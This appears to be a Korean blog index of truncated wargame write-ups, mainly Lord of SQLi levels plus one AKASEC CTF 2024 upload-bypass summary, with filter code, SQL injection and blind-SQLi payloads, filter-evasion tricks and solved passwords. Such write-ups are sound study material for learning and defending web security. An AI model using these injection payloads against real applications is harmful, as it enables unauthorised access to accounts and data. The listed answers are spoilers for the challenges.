supp0rt supp0rt

문제풀이 과정if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");   if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");  pw의 값에 or / and를 필터링 하는 것을 볼 수 있다 또한 admin의 진짜 pw값을 넣으면 문제가 풀린다 이를 통해 blind sql injection을 수행한다정답더보기?pw=7b751aec활용 코드python requests를 이용하여 코드를 작성하여 문제를 해결하였다 import requestsurl = "input your url" #cookie = {input your cookie} #user = 'input find user' # def change_bi..

문제풀이 과정if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");   if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");  pw의 값이 or / and 를 필터링 하는 것으로 보인다or 을 ||로 우회 더보기?pw=%27%20||%20id=%27admin%27%23

문제 풀이 과정if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");   if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~");  pw의 값 중, 공백을 필터링 하는 것으로 보인다. %09 => tab%0b / %0a => 특수 문자이지만 mysql에서 받아 들일 수 없으므로 공백으로 취급 정답더보기?pw=%27%09or%09id=%27admin%27%23

화이트햇 2기 프로젝트 'CTF 한 문제만 풀어보자 - 웹 해킹편' 중 AKASEC CTF 2024를 참가 문제 1. 파일 업로드 우회-> Content-Type을 application/pdf로 우회 2. 로컬에서 response값 가져오기-> js fetch를 이용하여 flag 들고옴 3. 준비해놓은 서버로 flag값 전송

풀이 과정Blind SQL Injection으로 수행length로 길이 체크 후 비트 마스킹 pw=' or id='admin' and length(pw) > 1 %23pw=' or id='admin' and length(pw) > 8 %23 => admin 의 pw의 최대 길이는 8 pw=' or id='admin' and ascii(substr(pw,1,1)) & 1 %23~pw=' or id='admin' and ascii(substr(pw,1,1)) & 128 %23 각 자리 수 도출 정답더보기?pw=095a9852

풀이 과정if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");   if(preg_match('/\'|\"|\`/i', $_GET[no])) exit("No Quotes ~_~");   $query = "select id from prob_goblin where id='guest' and no={$_GET[no]}";   echo "query : {$query}";   $result = @mysqli_fetch_array(mysqli_query($db,$query));   if($result['id']) echo "Hello {$result[id]}";   if($result['id'] == 'admin') solve("goblin"); ..

풀이 과정if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~");   if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");   $query = "select id from prob_cobolt where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}')";   echo "query : {$query}";   $result = @mysqli_fetch_array(mysqli_query($db,$query));   if($result['id'] == 'admin') solve("cobolt");  elseif($result['id']) echo "He..

풀이 과정if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); // do not try to attack another table, database!  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); $query = "select id from prob_gremlin where id='{$_GET[id]}' and pw='{$_GET[pw]}'";  $_GET['id']와 $_GET['[pw']를 받는 것을 확인 id = 'or 1=1 #을 넣으면 우회 가능 정답더보기id=%27%20or%201=1%20%23